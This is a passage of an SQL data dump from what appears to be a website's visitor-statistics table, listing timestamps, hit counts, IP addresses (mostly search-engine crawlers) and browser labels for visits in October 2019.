,2,2,0,0,'66.249.64.18','chrome'),(455816,1571066018,1,1,0,0,'66.249.64.16','chrome'),(455817,1571066176,1,1,0,0,'66.249.64.69','chrome'),(455818,1571066262,12,12,0,0,'66.249.64.94','chrome'),(455819,1571066270,1,1,0,0,'184.168.193.78','chrome'),(455820,1571066282,1,1,0,0,'66.249.64.66','chrome'),(455821,1571066460,1,1,0,0,'213.180.203.37','other'),(455822,1571066788,1,1,0,0,'157.55.39.218','other'),(455823,1571067479,11,11,0,0,'66.249.64.94','chrome'),(455824,1571067507,3,3,0,0,'66.249.64.18','chrome'),(455825,1571067642,3,3,0,0,'66.249.64.66','chrome'),(455826,1571067691,2,2,0,0,'8.29.198.25','other'),(455827,1571068310,2,2,0,0,'66.249.64.69','chrome'),(455828,1571068726,6,6,0,0,'66.249.64.94','chrome'),(455829,1571068807,2,2,0,0,'66.249.64.18','chrome'),(455830,1571068896,1,1,0,0,'157.55.39.102','other'),(455831,1571069635,9,9,0,0,'66.249.64.94','chrome'),(455832,1571069645,3,3,0,0,'66.249.64.69','chrome'),(455833,1571070260,2,2,0,0,'66.249.64.18','chrome'),(455834,1571070838,10,10,0,0,'66.249.64.94','chrome'),(455835,1571070843,5,5,0,0,'66.249.64.66','chrome'),(455836,1571071047,1,1,0,0,'92.113.156.60','chrome'),(455837,1571071501,2,2,0,0,'66.249.64.16','chrome'),(455838,1571071556,2,2,0,0,'66.249.64.69','chrome'),(455839,1571071739,1,1,0,0,'207.46.13.2','other'),(455840,1571072028,7,7,0,0,'66.249.64.94','chrome'),(455841,1571072086,4,4,0,0,'66.249.64.66','chrome'),(455842,1571072330,1,1,0,0,'66.249.64.18','chrome'),(455843,1571072541,2,2,0,0,'66.249.64.16','chrome'),(455844,1571072580,1,1,0,0,'157.55.39.218','other'),(455845,1571072682,1,1,0,0,'5.61.30.195','chrome'),(455846,1571072834,1,1,0,0,'207.46.13.244','other'),(455847,1571072838,1,1,0,0,'207.46.13.240','other'),(455848,1571072843,1,1,0,0,'207.46.13.248','other'),(455849,1571073237,6,6,0,0,'66.249.64.94','chrome'),(455850,1571073486,1,0,1,0,'66.249.64.66',''),(455851,1571074147,1,1,0,0,'46.211.149.49','chrome'),(455852,1571074531,11,11,0,0,'66.249.64.94','chrome'),(455853,1571074572,1,1,0,0,'66.249.64.16','chrome'),(455854,1571074620,1,1,0,0,'66.249.64.69','chrome'),(455855,1571074645,1,1,0,0,'149.56.192.232','chrome'),(455856,1571075058,1,1,0,0,'66.249.64.18','chrome'),(455857,1571075648,3,3,0,0,'66.249.64.66','chrome'),(455858,1571075662,8,8,0,0,'66.249.64.94','chrome'),(455859,1571075926,1,1,0,0,'66.249.64.69','chrome'),(455860,1571076546,1,1,0,0,'157.55.39.248','other'),(455861,1571076834,9,9,0,0,'66.249.64.94','chrome'),(455862,1571076840,3,3,0,0,'66.249.64.69','chrome'),(455863,1571076870,1,1,0,0,'66.249.64.18','chrome'),(455864,1571078006,1,1,0,0,'46.211.143.215','chrome'),(455865,1571078029,9,9,0,0,'66.249.64.94','chrome'),(455866,1571078067,1,1,0,0,'66.249.64.16','chrome'),(455867,1571078093,3,3,0,0,'66.249.64.66','chrome'),(455868,1571078561,1,1,0,0,'8.29.198.27','other'),(455869,1571078652,2,2,0,0,'66.249.64.18','chrome'),(455870,1571078780,1,1,0,0,'8.29.198.26','other'),(455871,1571079228,11,11,0,0,'66.249.64.94','chrome'),(455872,1571079331,1,1,0,0,'66.249.64.69','chrome'),(455873,1571079422,1,1,0,0,'66.249.64.66','chrome'),(455874,1571079941,1,1,0,0,'66.249.64.16','chrome'),(455875,1571080504,1,1,0,0,'66.249.64.69','chrome'),(455876,1571080508,1,1,0,0,'66.249.64.66','chrome'),(455877,1571080523,11,11,0,0,'66.249.64.94','chrome'),(455878,1571080551,1,1,0,0,'66.249.64.18','chrome'),(455879,1571081132,1,1,0,0,'66.249.64.16','chrome'),(455880,1571081713,11,11,0,0,'66.249.64.94','chrome'),(455881,1571081747,1,1,0,0,'66.249.64.18','chrome'),(455882,1571082052,1,1,0,0,'178.154.200.33','other'),(455883,1571082425,1,1,0,0,'66.249.64.66','chrome'),(455884,1571082955,13,13,0,0,'66.249.64.94','chrome'),(455885,1571083052,2,2,0,0,'66.249.64.16','chrome'),(455886,1571083249,1,1,0,0,'66.249.64.69','chrome'),(455887,1571083526,1,1,0,0,'157.55.39.217','other'),(455888,1571083566,2,2,0,0,'66.249.64.66','chrome'),(455889,1571083796,1,1,0,0,'157.55.39.202','other'),(455890,1571083880,2,2,0,0,'95.213.141.126','opera'),(455891,1571084142,8,8,0,0,'66.249.64.94','chrome'),(455892,1571084203,1,1,0,0,'66.249.64.69','chrome'),(455893,1571084850,6,6,0,0,'66.249.64.66','chrome'),(455894,1571084895,1,1,0,0,'66.249.64.16','chrome'),(455895,1571085545,2,2,0,0,'66.249.64.69','chrome'),(455896,1571085576,1,1,0,0,'66.249.64.18','chrome'),(455897,1571086075,7,7,0,0,'66.249.64.94','chrome'),(455898,1571086078,5,5,0,0,'66.249.64.66','chrome'),(455899,1571086121,2,2,0,0,'66.249.64.16','chrome'),(455900,1571086636,1,1,0,0,'66.249.64.18','chrome'),(455901,1571087185,10,10,0,0,'66.249.64.94','chrome'),(455902,1571087225,3,3,0,0,'66.249.64.66','chrome'),(455903,1571087867,1,1,0,0,'66.249.64.16','chrome'),(455904,1571088087,2,2,0,0,'157.55.39.137','other'),(455905,1571088091,9,9,0,0,'66.249.64.94','chrome'),(455906,1571088487,1,1,0,0,'157.55.39.217','other'),(455907,1571088508,3,3,0,0,'66.249.64.69','chrome'),(455908,1571088515,2,2,0,0,'66.249.64.66','chrome'),(455909,1571088934,2,2,0,0,'157.55.39.211','other'),(455910,1571089002,6,6,0,0,'66.249.64.94','chrome'),(455911,1571089006,1,1,0,0,'109.199.119.163','chrome'),(455912,1571089209,1,1,0,0,'207.46.13.210','other'),(455913,1571089424,2,2,0,0,'8.29.198.26','other'),(455914,1571089546,1,1,0,0,'157.55.39.93','other'),(455915,1571089684,1,1,0,0,'66.249.64.18','chrome'),(455916,1571089796,2,2,0,0,'66.249.64.69','chrome'),(455917,1571089931,9,9,0,0,'66.249.64.94','chrome'),(455918,1571090082,1,1,0,0,'157.55.39.211','other'),(455919,1571090464,1,1,0,0,'213.180.203.44','other'),(455920,1571090823,3,3,0,0,'66.249.64.66','chrome'),(455921,1571090833,1,1,0,0,'66.249.64.94','chrome'),(455922,1571090899,1,1,0,0,'66.249.64.18','chrome'),(455923,1571091016,1,1,0,0,'213.180.203.37','other'),(455924,1571091695,1,1,0,0,'157.55.39.217','other'),(455925,1571091772,2,2,0,0,'66.249.64.69','chrome'),(455926,1571091779,13,13,0,0,'66.249.64.94','chrome'),(455927,1571091780,2,2,0,0,'66.249.64.66','chrome'),(455928,1571091808,1,1,0,0,'66.249.64.18','chrome'),(455929,1571091815,1,1,0,0,'141.8.142.2','other'),(455930,1571092704,4,4,0,0,'66.249.64.94','chrome'),(455931,1571093220,3,3,0,0,'66.249.64.66','chrome'),(455932,1571093238,6,6,0,0,'95.217.76.85','chrome'),(455933,1571093342,2,2,0,0,'66.249.64.69','chrome'),(455934,1571093747,1,1,0,0,'213.180.203.44','other'),(455935,1571093809,10,10,0,0,'66.249.64.94','chrome'),(455936,1571093915,1,1,0,0,'66.249.64.18','chrome'),(455937,1571094119,1,1,0,0,'103.74.123.6','chrome'),(455938,1571094363,1,1,0,0,'157.55.39.211','other'),(455939,1571094491,1,1,0,0,'207.46.13.210','other'),(455940,1571094492,2,2,0,0,'66.249.64.16','chrome'),(455941,1571095003,2,2,0,0,'66.249.64.69','chrome'),(455942,1571095160,10,10,0,0,'66.249.64.94','chrome'),(455943,1571095891,2,2,0,0,'66.249.64.66','chrome'),(455944,1571096334,10,10,0,0,'66.249.64.94','chrome'),(455945,1571096379,1,1,0,0,'66.249.64.16','chrome'),(455946,1571096428,3,3,0,0,'67.231.28.145','chrome'),(455947,1571096629,2,2,0,0,'66.249.64.69','chrome'),(455948,1571096959,2,2,0,0,'66.249.64.18','chrome'),(455949,1571097020,2,2,0,0,'66.249.64.66','chrome'),(455950,1571097310,1,1,0,0,'62.205.134.182','other'),(455951,1571097557,10,10,0,0,'66.249.64.94','chrome'),(455952,1571098037,1,1,0,0,'213.180.203.44','other'),(455953,1571098194,1,1,0,0,'66.249.64.16','chrome'),(455954,1571098208,1,1,0,0,'66.249.64.66','chrome'),(455955,1571098307,1,1,0,0,'213.180.203.37','other'),(455956,1571098788,10,10,0,0,'66.249.64.94','chrome'),(455957,1571098801,3,3,0,0,'66.249.64.69','chrome'),(455958,1571098865,1,1,0,0,'66.249.64.18','chrome'),(455959,1571099773,1,1,0,0,'2.234.219.120','chrome'),(455960,1571100039,12,12,0,0,'66.249.64.94','chrome'),(455961,1571100066,2,2,0,0,'66.249.64.16','chrome'),(455962,1571100284,1,1,0,0,'8.29.198.27','other'),(455963,1571100450,1,1,0,0,'8.29.198.26','other'),(455964,1571100601,1,1,0,0,'141.8.142.161','other'),(455965,1571100648,1,1,0,0,'93.125.99.128','chrome'),(455966,1571101232,10,10,0,0,'66.249.64.94','chrome'),(455967,1571101277,1,1,0,0,'66.249.64.16','chrome'),(455968,1571101292,2,2,0,0,'66.249.64.69','chrome'),(455969,1571101698,1,1,0,0,'123.30.129.254','chrome'),(455970,1571102024,2,2,0,0,'66.249.64.18','chrome'),(455971,1571102114,2,2,0,0,'207.46.13.15','other'),(455972,1571102480,10,10,0,0,'66.249.64.94','chrome'),(455973,1571103127,2,2,0,0,'66.249.64.69','chrome'),(455974,1571103133,3,3,0,0,'66.249.64.66','chrome'),(455975,1571103741,11,11,0,0,'66.249.64.94','chrome'),(455976,1571103773,1,1,0,0,'66.249.64.16','chrome'),(455977,1571104099,1,1,0,0,'207.46.13.234','other'),(455978,1571104361,3,3,0,0,'66.249.64.18','chrome'),(455979,1571104946,10,10,0,0,'66.249.64.94','chrome'),(455980,1571105010,1,1,0,0,'66.249.64.66','chrome'),(455981,1571105682,2,2,0,0,'66.249.64.69','chrome'),(455982,1571106164,11,11,0,0,'66.249.64.94','chrome'),(455983,1571106192,1,1,0,0,'141.8.142.50','chrome'),(455984,1571106194,1,1,0,0,'66.249.64.18','chrome'),(455985,1571106882,1,1,0,0,'66.249.64.66','chrome'),(455986,1571107373,9,9,0,0,'66.249.64.94','chrome'),(455987,1571107489,2,2,0,0,'66.249.64.69','chrome'),(455988,1571107966,1,1,0,0,'116.0.22.229','chrome'),(455989,1571108000,1,1,0,0,'66.249.64.66','chrome'),(455990,1571108049,1,1,0,0,'66.249.64.18','chrome'),(455991,1571108578,13,13,0,0,'66.249.64.94','chrome'),(455992,1571108665,1,1,0,0,'66.249.64.16','chrome'),(455993,1571108967,1,1,0,0,'66.249.64.66','chrome'),(455994,1571109245,2,2,0,0,'66.249.64.18','chrome'),(455995,1571109614,13,13,0,0,'66.249.64.94','chrome'),(455996,1571110419,1,1,0,0,'185.4.75.227','chrome'),(455997,1571110903,1,1,0,0,'195.128.17.206','other'),(455998,1571110977,11,11,0,0,'66.249.64.94','chrome'),(455999,1571111009,1,1,0,0,'66.249.64.18','chrome'),(456000,1571111135,1,1,0,0,'8.29.198.27','other'),(456001,1571111288,1,1,0,0,'8.29.198.25','other'),(456002,1571111758,1,1,0,0,'66.249.64.16','chrome'),(456003,1571111775,2,2,0,0,'66.249.64.69','chrome'),(456004,1571112116,2,2,0,0,'212.48.89.54','chrome'),(456005,1571112247,9,9,0,0,'66.249.64.94','chrome'),(456006,1571112253,3,3,0,0,'66.249.64.66','chrome'),(456007,1571112322,2,2,0,0,'66.249.64.18','chrome'),(456008,1571112926,3,3,0,0,'66.249.64.69','chrome'),(456009,1571113444,1,1,0,0,'66.249.64.66','chrome'),(456010,1571113450,9,9,0,0,'66.249.64.94','chrome'),(456011,1571113478,2,2,0,0,'66.249.64.16','chrome'),(456012,1571113905,3,3,0,0,'66.249.64.69','chrome'),(456013,1571113924,1,1,0,0,'207.46.13.113','other'),(456014,1571114074,2,2,0,0,'66.249.64.18','chrome'),(456015,1571114187,1,1,0,0,'157.55.39.8','other'),(456016,1571114687,10,10,0,0,'66.249.64.94','chrome'),(456017,1571114803,1,1,0,0,'62.205.134.182','other'),(456018,1571115177,1,1,0,0,'207.46.13.56','other'),(456019,1571115320,2,2,0,0,'66.249.64.16','chrome'),(456020,1571115331,2,2,0,0,'66.249.64.69','chrome'),(456021,1571115958,11,11,0,0,'66.249.64.94','chrome'),(456022,1571116644,2,2,0,0,'66.249.64.69','chrome'),(456023,1571116778,2,2,0,0,'66.249.64.66','chrome'),(456024,1571116810,1,1,0,0,'66.249.64.16','chrome'),(456025,1571116861,5,5,0,0,'66.249.64.94','chrome'),(456026,1571117336,2,2,0,0,'66.249.64.18','chrome'),(456027,1571117895,3,3,0,0,'66.249.64.69','chrome'),(456028,1571117903,7,7,0,0,'66.249.64.94','chrome'),(456029,1571117905,5,5,0,0,'66.249.64.66','chrome'),(456030,1571118183,1,1,0,0,'157.55.39.132','other'),(456031,1571118597,3,3,0,0,'91.209.11.236','other'),(456032,1571119011,1,1,0,0,'81.27.85.11','chrome'),(456033,1571119043,12,12,0,0,'66.249.64.94','chrome'),(456034,1571119142,1,1,0,0,'66.249.64.16','chrome'),(456035,1571119405,1,1,0,0,'213.180.203.37','other'),(456036,1571119433,5,5,0,0,'66.249.64.66','chrome'),(456037,1571119694,3,3,0,0,'66.249.64.69','chrome'),(456038,1571119899,3,3,0,0,'67.231.28.145','chrome'),(456039,1571119999,1,1,0,0,'91.209.11.236','other'),(456040,1571120038,31,31,0,0,'66.249.64.94','chrome'),(456041,1571120422,6,6,0,0,'66.249.64.66','chrome'),(456042,1571120521,4,4,0,0,'66.249.64.18','chrome'),(456043,1571120579,1,1,0,0,'91.196.178.26','chrome'),(456044,1571120743,1,1,0,0,'103.110.91.155','chrome'),(456045,1571120977,5,5,0,0,'66.249.64.69','chrome'),(456046,1571120982,16,16,0,0,'66.249.64.94','chrome'),(456047,1571121059,1,1,0,0,'207.46.13.200','other'),(456048,1571121399,5,5,0,0,'66.249.64.66','chrome'),(456049,1571121758,1,1,0,0,'213.108.44.26','chrome'),(456050,1571121978,1,1,0,0,'8.29.198.27','other'),(456051,1571122000,8,8,0,0,'66.249.64.94','chrome'),(456052,1571122126,1,1,0,0,'8.29.198.25','other'),(456053,1571122144,4,4,0,0,'66.249.64.69','chrome'),(456054,1571122167,1,1,0,0,'157.55.39.132','other'),(456055,1571122196,3,3,0,0,'66.249.64.16','chrome'),(456056,1571122741,11,11,0,0,'66.249.64.66','chrome'),(456057,1571123156,4,4,0,0,'66.249.64.69','chrome'),(456058,1571123230,7,7,0,0,'66.249.64.94','chrome'),(456059,1571123293,2,2,0,0,'66.249.64.18','chrome'),(456060,1571123588,1,1,0,0,'46.211.153.152','chrome'),(456061,1571123864,6,6,0,0,'66.249.64.66','chrome'),(456062,1571124200,1,1,0,0,'46.48.13.161','chrome'),(456063,1571124303,1,1,0,0,'66.249.64.16','chrome'),(456064,1571124362,2,2,0,0,'77.104.154.195','chrome'),(456065,1571124535,6,6,0,0,'66.249.64.94','chrome'),(456066,1571124631,4,4,0,0,'66.249.64.69','chrome'),(456067,1571125072,1,1,0,0,'209.17.96.170','other'),(456068,1571125163,1,1,0,0,'66.249.64.66','chrome'),(456069,1571125257,1,1,0,0,'209.205.206.58','chrome'),(456070,1571125773,12,12,0,0,'66.249.64.94','chrome'),(456071,1571125840,2,2,0,0,'207.46.13.41','other'),(456072,1571126007,1,1,0,0,'91.196.178.84','chrome'),(456073,1571126326,1,1,0,0,'193.106.30.99','chrome'),(456074,1571126753,1,1,0,0,'91.196.178.66','chrome'),(456075,1571126821,2,2,0,0,'66.249.64.69','chrome'),(456076,1571126843,6,6,0,0,'66.249.64.66','chrome'),(456077,1571127037,5,5,0,0,'66.249.64.94','chrome'),(456078,1571127199,1,1,0,0,'157.55.39.132','other'),(456079,1571127794,1,1,0,0,'207.46.13.41','other'),(456080,1571128137,2,2,0,0,'66.249.64.66','chrome'),(456081,1571128171,7,7,0,0,'66.249.64.94','chrome'),(456082,1571128416,1,1,0,0,'46.151.189.37','chrome'),(456083,1571128613,1,1,0,0,'66.249.64.16','chrome'),(456084,1571129137,1,1,0,0,'91.196.178.174','opera'),(456085,1571129344,1,1,0,0,'91.196.178.84','chrome'),(456086,1571129367,12,12,0,0,'66.249.64.94','chrome'),(456087,1571129604,2,2,0,0,'66.249.64.69','chrome'),(456088,1571129724,3,3,0,0,'66.249.64.66','chrome'),(456089,1571130362,9,9,0,0,'66.249.64.94','chrome'),(456090,1571130483,2,2,0,0,'5.61.30.195','chrome'),(456091,1571130556,1,1,0,0,'91.124.182.170','chrome'),(456092,1571130583,1,1,0,0,'66.249.64.69','chrome'),(456093,1571130732,1,1,0,0,'66.249.64.18','chrome'),(456094,1571130994,1,1,0,0,'91.196.178.84','chrome'),(456095,1571131198,1,1,0,0,'66.249.64.66','chrome'),(456096,1571131451,5,5,0,0,'66.249.64.94','chrome'),(456097,1571131502,1,1,0,0,'91.196.178.66','chrome'),(456098,1571131562,1,1,0,0,'94.45.156.34','firefox'),(456099,1571131703,1,1,0,0,'207.46.13.56','other'),(456100,1571132173,1,1,0,0,'162.241.218.130','chrome'),(456101,1571132467,2,2,0,0,'66.249.64.69','chrome'),(456102,1571132481,6,6,0,0,'66.249.64.66','chrome'),(456103,1571132486,6,6,0,0,'66.249.64.94','chrome'),(456104,1571132834,2,2,0,0,'8.29.198.26','other'),(456105,1571133048,1,1,0,0,'66.249.64.16','chrome'),(456106,1571133164,1,1,0,0,'157.55.39.132','other'),(456107,1571133407,9,9,0,0,'66.249.64.94','chrome'),(456108,1571133622,2,2,0,0,'77.221.130.153','chrome'),(456109,1571134439,1,1,0,0,'13.66.139.0','other'),(456110,1571134464,6,6,0,0,'66.249.64.94','chrome'),(456111,1571134928,1,1,0,0,'157.55.39.132','other'),(456112,1571135018,1,1,0,0,'66.249.64.69','chrome'),(456113,1571135436,5,5,0,0,'66.249.64.94','chrome'),(456114,1571135541,1,1,0,0,'157.245.143.80','chrome'),(456115,1571136094,2,2,0,0,'66.249.64.66','chrome'),(456116,1571136095,1,1,0,0,'66.249.64.69','chrome'),(456117,1571136607,8,8,0,0,'66.249.64.94','chrome'),(456118,1571136916,2,2,0,0,'157.55.39.132','other'),(456119,1571137001,1,1,0,0,'66.249.64.16','chrome'),(456120,1571137352,1,1,0,0,'66.249.64.69','chrome'),(456121,1571137415,1,1,0,0,'207.46.13.56','other'),(456122,1571137575,1,1,0,0,'153.92.11.1','chrome'),(456123,1571137785,1,1,0,0,'31.13.127.4','other'),(456124,1571137786,1,1,0,0,'31.13.127.20','other'),(456125,1571137811,11,11,0,0,'66.249.64.94','chrome'),(456126,1571138510,1,1,0,0,'66.249.64.69','chrome'),(456127,1571139155,7,7,0,0,'66.249.64.94','chrome'),(456128,1571139684,1,1,0,0,'66.249.64.69','chrome'),(456129,1571139691,4,4,0,0,'66.249.64.66','chrome'),(456130,1571140305,5,5,0,0,'66.249.64.94','chrome'),(456131,1571140829,1,1,0,0,'66.249.69.126','chrome'),(456132,1571140854,1,1,0,0,'66.249.64.16','chrome'),(456133,1571140869,2,2,0,0,'66.249.64.66','chrome'),(456134,1571141431,9,9,0,0,'66.249.64.94','chrome'),(456135,1571141464,1,1,0,0,'91.196.177.228','chrome'),(456136,1571142180,1,1,0,0,'109.74.154.72','chrome'),(456137,1571142676,1,1,0,0,'66.249.64.69','chrome'),(456138,1571142681,7,7,0,0,'66.249.64.94','chrome'),(456139,1571143153,1,1,0,0,'82.207.49.58','chrome'),(456140,1571143689,1,1,0,0,'8.29.198.25','other'),(456141,1571143694,1,1,0,0,'66.249.64.69','chrome'),(456142,1571143806,1,1,0,0,'91.196.178.84','chrome'),(456143,1571143821,1,1,0,0,'8.29.198.27','other'),(456144,1571143833,8,8,0,0,'66.249.64.94','chrome'),(456145,1571144190,1,1,0,0,'91.196.178.174','opera'),(456146,1571144515,1,1,0,0,'77.222.143.222','msie'),(456147,1571145031,7,7,0,0,'66.249.64.94','chrome'),(456148,1571145487,1,1,0,0,'91.196.178.132','chrome'),(456149,1571145570,2,2,0,0,'66.249.64.66','chrome'),(456150,1571145778,1,1,0,0,'66.249.64.16','chrome'),(456151,1571146050,1,1,0,0,'66.249.64.18','chrome'),(456152,1571146239,7,7,0,0,'66.249.64.94','chrome'),(456153,1571147012,5,5,0,0,'66.249.64.66','chrome'),(456154,1571147768,1,1,0,0,'66.249.64.69','chrome'),(456155,1571148109,8,8,0,0,'66.249.64.94','chrome'),(456156,1571148673,1,1,0,0,'66.249.64.16','chrome'),(456157,1571149227,1,1,0,0,'207.46.13.48','other'),(456158,1571149292,8,8,0,0,'66.249.64.94','chrome'),(456159,1571150339,1,1,0,0,'195.10.210.70','chrome'),(456160,1571150508,9,9,0,0,'66.249.64.94','chrome'),(456161,1571151696,7,7,0,0,'66.249.64.94','chrome'),(456162,1571152340,1,1,0,0,'66.249.64.69','chrome'),(456163,1571152660,1,1,0,0,'157.55.39.240','other'),(456164,1571152902,8,8,0,0,'66.249.64.94','chrome'),(456165,1571153291,1,1,0,0,'207.46.13.48','other'),(456166,1571153544,1,1,0,0,'66.249.64.69','chrome'),(456167,1571154106,3,3,0,0,'66.249.64.94','chrome'),(456168,1571154122,2,2,0,0,'66.249.64.66','chrome'),(456169,1571154599,1,1,0,0,'8.29.198.27','other'),(456170,1571154706,1,1,0,0,'8.29.198.26','other'),(456171,1571154863,1,1,0,0,'66.249.64.69','chrome'),(456172,1571155329,8,8,0,0,'66.249.64.94','chrome'),(456173,1571155931,1,1,0,0,'66.249.64.69','chrome'),(456174,1571156012,5,5,0,0,'66.249.64.66','chrome'),(456175,1571156050,2,2,0,0,'66.249.64.18','chrome'),(456176,1571156329,1,1,0,0,'66.249.64.16','chrome'),(456177,1571156500,8,8,0,0,'66.249.64.94','chrome'),(456178,1571157138,2,2,0,0,'88.99.2.203','other'),(456179,1571157177,4,4,0,0,'136.243.70.68','other'),(456180,1571157303,1,1,0,0,'91.196.178.81','firefox'),(456181,1571157781,2,2,0,0,'52.33.29.45','chrome'),(456182,1571158508,1,1,0,0,'88.99.2.203','other'),(456183,1571158651,2,2,0,0,'66.249.64.69','chrome'),(456184,1571158991,1,1,0,0,'193.202.91.11','chrome'),(456185,1571159155,3,3,0,0,'66.249.64.94','chrome'),(456186,1571159484,3,3,0,0,'66.249.64.66','chrome'),(456187,1571159506,1,1,0,0,'88.99.2.203','other'),(456188,1571159623,1,1,0,0,'46.48.13.161','firefox'),(456189,1571159829,1,1,0,0,'116.0.22.229','chrome'),(456190,1571159853,1,1,0,0,'213.180.203.37','other'),(456191,1571160366,12,12,0,0,'66.249.64.94','chrome'),(456192,1571160426,1,1,0,0,'88.99.2.203','other'),(456193,1571160473,1,1,0,0,'66.249.64.18','chrome'),(456194,1571160477,1,1,0,0,'207.46.13.229','other'),(456195,1571160520,22,22,0,0,'116.0.20.107','chrome'),(456196,1571161266,4,4,0,0,'66.249.64.69','chrome'),(456197,1571161274,4,4,0,0,'66.249.64.66','chrome'),(456198,1571161281,7,7,0,0,'66.249.64.94','chrome'),(456199,1571161397,1,1,0,0,'88.99.2.203','other'),(456200,1571161521,1,1,0,0,'207.46.13.48','other'),(456201,1571161589,1,1,0,0,'157.55.39.90','other'),(456202,1571162422,1,1,0,0,'88.99.2.203','other'),(456203,1571162540,4,4,0,0,'66.249.64.94','chrome'),(456204,1571162597,2,2,0,0,'141.138.168.123','chrome'),(456205,1571162832,1,1,0,0,'141.8.142.177','other'),(456206,1571163088,1,1,0,0,'207.46.13.48','other'),(456207,1571164439,1,1,0,0,'66.249.64.69','chrome'),(456208,1571164657,2,2,0,0,'66.249.64.66','chrome'),(456209,1571164662,9,9,0,0,'66.249.64.94','chrome'),(456210,1571165038,1,1,0,0,'207.46.13.48','other'),(456211,1571165333,1,1,0,0,'64.90.48.188','chrome'),(456212,1571165463,1,1,0,0,'8.29.198.27','other'),(456213,1571165565,7,7,0,0,'66.249.64.94','chrome'),(456214,1571165584,1,1,0,0,'8.29.198.26','other'),(456215,1571165853,1,1,0,0,'37.9.113.177','other'),(456216,1571165854,1,1,0,0,'141.8.132.12','other'),(456217,1571166187,1,1,0,0,'66.249.64.69','chrome'),(456218,1571166331,1,1,0,0,'69.163.163.120','chrome'),(456219,1571166744,5,5,0,0,'66.249.64.94','chrome'),(456220,1571168925,1,1,0,0,'66.249.64.69','chrome'),(456221,1571169120,1,1,0,0,'192.185.128.92','chrome'),(456222,1571172087,1,1,0,0,'66.249.64.69','chrome'),(456223,1571172619,1,1,0,0,'66.249.64.16','chrome'),(456224,1571174610,1,1,0,0,'66.249.64.94','chrome'),(456225,1571176340,2,2,0,0,'8.29.198.25','other'),(456226,1571176814,1,1,0,0,'38.99.62.94','other'),(456227,1571176921,1,1,0,0,'66.249.64.94','chrome'),(456228,1571177331,1,1,0,0,'173.252.95.17','other'),(456229,1571177511,1,1,0,0,'193.106.30.99','chrome'),(456230,1571177571,1,1,0,0,'213.180.203.44','other'),(456231,1571178167,1,1,0,0,'66.249.64.66','chrome'),(456232,1571178592,1,1,0,0,'213.180.203.37','other'),(456233,1571179460,2,2,0,0,'103.110.91.155','chrome'),(456234,1571179842,1,1,0,0,'123.30.129.254','chrome'),(456235,1571181848,1,1,0,0,'66.249.64.94','chrome'),(456236,1571182200,1,1,0,0,'66.249.64.66','chrome'),(456237,1571182798,1,1,0,0,'213.180.203.44','other'),(456238,1571183408,1,1,0,0,'204.93.196.26','chrome'),(456239,1571183705,1,1,0,0,'157.55.39.210','other'),(456240,1571183714,1,1,0,0,'62.205.134.182','other'),(456241,1571184745,1,1,0,0,'207.46.13.154','other'),(456242,1571185242,1,1,0,0,'141.8.142.2','other'),(456243,1571185410,2,2,0,0,'66.249.64.94','chrome'),(456244,1571185872,1,1,0,0,'91.209.11.236','other'),(456245,1571186574,1,1,0,0,'66.249.64.66','chrome'),(456246,1571187194,1,1,0,0,'8.29.198.25','other'),(456247,1571187304,1,1,0,0,'8.29.198.27','other'),(456248,1571187820,1,1,0,0,'207.46.13.240','other'),(456249,1571188952,1,1,0,0,'213.180.203.44','other'),(456250,1571189694,1,1,0,0,'66.249.64.94','chrome'),(456251,1571189776,2,2,0,0,'66.249.64.69','chrome'),(456252,1571190251,2,2,0,0,'207.46.13.154','other'),(456253,1571190880,1,1,0,0,'66.249.64.94','chrome'),(456254,1571191482,1,1,0,0,'213.180.203.44','other'),(456255,1571192309,1,1,0,0,'207.46.13.202','other'),(456256,1571192522,3,3,0,0,'192.198.90.198','chrome'),(456257,1571193022,1,1,0,0,'66.249.64.69','chrome'),(456258,1571193049,2,2,0,0,'66.249.64.94','chrome'),(456259,1571193096,1,1,0,0,'66.249.64.66','chrome'),(456260,1571193808,1,1,0,0,'207.46.13.202','other'),(456261,1571194256,1,1,0,0,'66.249.64.18','chrome'),(456262,1571194631,4,4,0,0,'103.28.38.21','chrome'),(456263,1571194982,1,1,0,0,'66.249.64.69','chrome'),(456264,1571195777,1,1,0,0,'204.93.196.26','chrome'),(456265,1571195829,1,1,0,0,'207.46.13.202','other'),(456266,1571197456,1,1,0,0,'66.249.64.94','chrome'),(456267,1571197466,1,1,0,0,'66.249.64.66','chrome'),(456268,1571197595,1,1,0,0,'207.46.13.202','other'),(456269,1571198060,2,2,0,0,'8.29.198.27','other'),(456270,1571198326,1,1,0,0,'184.168.27.186','chrome'),(456271,1571200943,1,1,0,0,'91.196.178.83','chrome'),(456272,1571200962,1,1,0,0,'207.46.13.154','other'),(456273,1571201061,1,1,0,0,'62.205.134.182','other'),(456274,1571201868,1,1,0,0,'199.192.31.217','chrome'),(456275,1571201890,1,1,0,0,'207.46.13.202','other'),(456276,1571202376,1,1,0,0,'207.46.13.154','other'),(456277,1571203543,1,1,0,0,'66.249.64.66','chrome'),(456278,1571204927,1,1,0,0,'37.73.252.61','chrome'),(456279,1571205131,2,2,0,0,'91.196.178.84','chrome'),(456280,1571205167,1,1,0,0,'66.249.64.66','chrome'),(456281,1571205424,1,1,0,0,'207.46.13.31','other'),(456282,1571205779,1,1,0,0,'207.46.13.148','other'),(456283,1571206140,2,2,0,0,'207.46.13.202','other'),(456284,1571206185,1,1,0,0,'95.134.189.48','chrome'),(456285,1571206194,1,1,0,0,'91.196.177.46','chrome'),(456286,1571206447,1,1,0,0,'213.108.44.26','chrome'),(456287,1571206677,1,1,0,0,'91.196.178.85','chrome'),(456288,1571207097,1,1,0,0,'207.46.13.202','other'),(456289,1571207840,1,1,0,0,'109.234.161.48','chrome'),(456290,1571208060,1,1,0,0,'207.46.13.148','other'),(456291,1571208907,2,2,0,0,'8.29.198.26','other'),(456292,1571209121,1,1,0,0,'207.46.13.148','other'),(456293,1571209409,1,1,0,0,'91.196.177.46','firefox'),(456294,1571209582,1,1,0,0,'207.46.13.31','other'),(456295,1571209808,1,1,0,0,'116.0.22.229','chrome'),(456296,1571210401,3,3,0,0,'66.249.64.66','chrome'),(456297,1571210407,7,7,0,0,'66.249.64.94','chrome'),(456298,1571210417,1,1,0,0,'66.249.64.18','chrome'),(456299,1571210548,6,6,0,0,'66.249.64.16','chrome'),(456300,1571212187,1,1,0,0,'212.48.94.202','chrome'),(456301,1571212242,1,1,0,0,'207.46.13.148','other'),(456302,1571212626,9,9,0,0,'66.249.64.66','chrome'),(456303,1571212639,4,4,0,0,'66.249.64.16','chrome'),(456304,1571212700,33,33,0,0,'66.249.64.94','chrome'),(456305,1571212701,3,3,0,0,'66.249.64.69','chrome'),(456306,1571212719,3,3,0,0,'66.249.64.18','chrome'),(456307,1571214240,1,1,